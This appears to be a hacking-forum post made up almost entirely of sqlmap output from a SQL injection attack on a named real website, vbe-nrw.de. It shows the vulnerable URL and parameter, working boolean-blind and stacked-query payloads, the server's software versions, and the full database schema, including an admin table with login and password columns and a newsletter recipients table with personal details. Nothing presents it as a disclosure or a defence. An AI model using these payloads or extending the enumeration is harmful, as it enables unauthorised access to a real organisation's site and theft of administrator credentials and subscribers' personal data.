Anmelden
Benutzerkonto erstellen
http://www.vbe-nrw.de/index.php?content_id=3479
Parameter: content_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content_id=3479' AND 6677=6677 AND 'TCgR'='TCgR
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: content_id=3479';(SELECT * FROM (SELECT(SLEEP(5)))vsDF)#
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] vbenrw
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: content_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content_id=3479' AND 6677=6677 AND 'TCgR'='TCgR
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: content_id=3479';(SELECT * FROM (SELECT(SLEEP(5)))vsDF)#
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
Database: vbenrw
Table: templates_rights
[3 columns]
+-------------------+---------+
| Column | Type |
+-------------------+---------+
| admin_id | int(11) |
| template_id | int(11) |
| template_right_id | int(11) |
+-------------------+---------+
Database: vbenrw
Table: content_menu
[3 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| cm_id | int(11) |
| content_id | int(11) |
| menu_id | int(11) |
+------------+---------+
Database: vbenrw
Table: bildergallerien_bilder
[5 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| desc | text |
| alt | varchar(128) |
| bild_id | int(11) |
| datei | varchar(128) |
| gallerie_id | int(11) |
+-------------+--------------+
Database: vbenrw
Table: menu_rights
[3 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| admin_id | int(11) |
| menu_id | int(11) |
| right_id | int(11) |
+----------+---------+
Database: vbenrw
Table: bildergallerien
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| abfrage_id | int(11) |
| gallerie_id | int(11) |
| ordner | varchar(128) |
| ueberschrift | varchar(128) |
+--------------+--------------+
Database: vbenrw
Table: newsletter
[10 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| timestamp | varchar(14) |
| anhaenge | varchar(128) |
| betreff | varchar(128) |
| format | varchar(16) |
| from_email | varchar(128) |
| from_name | varchar(128) |
| gruppen | varchar(128) |
| newsletter_id | int(11) |
| sent | tinyint(1) |
| text_html | text |
+---------------+--------------+
Database: vbenrw
Table: templates_content_content
[6 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| content | text |
| content_id | int(11) |
| part | varchar(32) |
| tc_field_id | int(11) |
| tc_id | int(11) |
| tcc_id | int(11) |
+-------------+-------------+
Database: vbenrw
Table: rss_channels
[11 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| language | char(2) |
| abfrage_id | int(11) |
| bezeichnung | varchar(255) |
| channel_id | int(11) |
| copyright | varchar(255) |
| description | varchar(255) |
| display_limit | int(11) |
| link | varchar(255) |
| order_by | varchar(32) |
| order_type | varchar(4) |
| title | varchar(255) |
+---------------+--------------+
Database: vbenrw
Table: menu
[14 columns]
+-------------------------+--------------------+
| Column | Type |
+-------------------------+--------------------+
| add_html_after | text |
| add_html_after_inactive | text |
| bezeichnung | varchar(128) |
| externer_link | varchar(255) |
| externer_link_target | varchar(16) |
| kurzbezeichnung | varchar(64) |
| listen_id | int(11) |
| members_only | tinyint(4) |
| menu_action | varchar(32) |
| menu_id | int(11) |
| order_by | varchar(32) |
| order_type | enum('ASC','DESC') |
| parent_id | int(11) |
| sortierindex | int(11) |
+-------------------------+--------------------+
Database: vbenrw
Table: newsletter_gruppenzuordnung
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| ne_id | int(11) |
| ng_id | int(11) |
| ngz_id | int(11) |
+--------+---------+
Database: vbenrw
Table: newsletter_empfaenger
[6 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| anrede | varchar(32) |
| email | varchar(128) |
| firma | varchar(128) |
| nachname | varchar(64) |
| ne_id | int(11) |
| vorname | varchar(64) |
+----------+--------------+
Database: vbenrw
Table: content
[16 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| timestamp | timestamp |
| content_id | int(11) |
| freigabe | tinyint(4) |
| members_only | tinyint(4) |
| menutitel | varchar(128) |
| poster | varchar(64) |
| sortierindex | int(11) |
| tc_id | int(11) |
| teaser | text |
| template_id | int(11) |
| text_html | text |
| ueberschrift | varchar(128) |
| uid | int(11) |
| v_menu_id | int(11) |
| valid_from | timestamp |
| valid_to | timestamp |
+--------------+--------------+
Database: vbenrw
Table: session
[4 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| session | varchar(32) |
| timestamp | varchar(14) |
| session_id | int(11) |
| uid | int(11) |
+------------+-------------+
Database: vbenrw
Table: newsletter_gruppen_rights
[3 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| admin_id | int(11) |
| ng_id | int(11) |
| ng_right_id | int(11) |
+-------------+---------+
Database: vbenrw
Table: newsletter_anhaenge
[2 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| datei | varchar(128) |
| na_id | int(11) |
+--------+--------------+
Database: vbenrw
Table: preview
[4 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| timestamp | varchar(14) |
| preview_id | int(11) |
| previewdata | text |
| uniqid | varchar(128) |
+-------------+--------------+
Database: vbenrw
Table: config
[7 columns]
+--------------+-----------------------------+
| Column | Type |
+--------------+-----------------------------+
| config_id | int(11) |
| configtype | enum('sys','menu','module') |
| menu_entry | text |
| module_entry | text |
| module_id | int(13) |
| sys_entry | text |
| varname | varchar(128) |
+--------------+-----------------------------+
Database: vbenrw
Table: listen
[10 columns]
+-------------------+--------------------+
| Column | Type |
+-------------------+--------------------+
| bezeichnung | varchar(64) |
| display_limit | int(11) |
| html_end | text |
| html_end_last | text |
| html_repeat | text |
| html_start | text |
| listen_id | int(11) |
| order_by | varchar(32) |
| order_type | enum('ASC','DESC') |
| use_html_end_last | tinyint(4) |
+-------------------+--------------------+
Database: vbenrw
Table: templates
[16 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| bezeichnung | varchar(128) |
| bf_template_id | int(11) |
| edit_alignment | tinyint(1) |
| edit_classes | tinyint(1) |
| edit_fontstyle | tinyint(1) |
| edit_html | tinyint(1) |
| edit_images | tinyint(1) |
| edit_indent | tinyint(1) |
| edit_lines | tinyint(1) |
| edit_links | tinyint(1) |
| edit_lists | tinyint(1) |
| edit_media | tinyint(1) |
| edit_tables | tinyint(1) |
| pt_template_id | int(11) |
| template_id | int(11) |
| text_html | text |
+----------------+--------------+
Database: vbenrw
Table: templates_content
[2 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| bezeichnung | varchar(128) |
| tc_id | int(11) |
+-------------+--------------+
Database: vbenrw
Table: bilder
[5 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| bild_id | int(11) |
| datei | varchar(128) |
| ordner | varchar(128) |
| thumb | tinyint(4) |
| unterschrift | text |
+--------------+--------------+
Database: vbenrw
Table: content_abfragen
[3 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| abfrage_id | int(11) |
| ca_id | int(11) |
| content_id | int(11) |
+------------+---------+
Database: vbenrw
Table: downloads
[5 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| beschreibung | text |
| datei | varchar(128) |
| download_id | int(11) |
| hits | int(11) |
| ordner | varchar(128) |
+--------------+--------------+
Database: vbenrw
Table: admin_rights
[3 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| admin_id | int(11) |
| adminright | varchar(32) |
| right_id | int(11) |
+------------+-------------+
Database: vbenrw
Table: abfragen
[10 columns]
+-------------------+--------------------+
| Column | Type |
+-------------------+--------------------+
| abfrage_id | int(11) |
| bezeichnung | varchar(64) |
| display_limit | int(11) |
| html_end | text |
| html_end_last | text |
| html_repeat | text |
| html_start | text |
| order_by | varchar(32) |
| order_type | enum('ASC','DESC') |
| use_html_end_last | tinyint(4) |
+-------------------+--------------------+
Database: vbenrw
Table: abfragen_rights
[3 columns]
+-------------------+---------+
| Column | Type |
+-------------------+---------+
| abfrage_id | int(11) |
| admin_id | int(11) |
| template_right_id | int(11) |
+-------------------+---------+
Database: vbenrw
Table: newsletter_gruppen
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gruppe | varchar(64) |
| ng_id | int(11) |
+--------+-------------+
Database: vbenrw
Table: admin
[22 columns]
+----------------------+-------------+
| Column | Type |
+----------------------+-------------+
| admin_id | int(11) |
| can_publicate | tinyint(4) |
| edit_alignment | tinyint(1) |
| edit_classes | tinyint(1) |
| edit_fontstyle | tinyint(1) |
| edit_html | tinyint(1) |
| edit_images | tinyint(1) |
| edit_indent | tinyint(1) |
| edit_lines | tinyint(1) |
| edit_links | tinyint(1) |
| edit_lists | tinyint(1) |
| edit_media | tinyint(1) |
| edit_tables | tinyint(1) |
| grant_not_publicated | tinyint(4) |
| kuerzel | char(3) |
| login | varchar(64) |
| nachname | varchar(64) |
| password | varchar(64) |
| show_all_abfragen | tinyint(4) |
| show_all_menues | tinyint(4) |
| show_free_content | tinyint(4) |
| vorname | varchar(64) |
+----------------------+-------------+
Database: vbenrw
Table: templates_content_rights
[3 columns]
+-------------------+---------+
| Column | Type |
+-------------------+---------+
| admin_id | int(11) |
| tc_id | int(11) |
| template_right_id | int(11) |
+-------------------+---------+
Database: vbenrw
Table: modules
[7 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| version | varchar(16) |
| bezeichnung | varchar(128) |
| classname | varchar(128) |
| file | varchar(128) |
| has_admin | tinyint(4) |
| module_id | int(11) |
| run_on_action | varchar(32) |
+---------------+--------------+
Database: vbenrw
Table: templates_content_fields
[8 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| bezeichnung | varchar(128) |
| break_after | tinyint(4) |
| funktion | varchar(128) |
| html | text |
| html_empty | text |
| sortierindex | int(11) |
| tc_field_id | int(11) |
| tc_id | int(11) |
+--------------+--------------+
Database: vbenrw
Table: vbe_untergliederungen
[3 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| kalender | varchar(20) |
| name | varchar(100) |
| startseite | int(11) |
+------------+--------------+
Nach oben
Melden
Classic Hacking
Suchanfragen
Hacking & Security
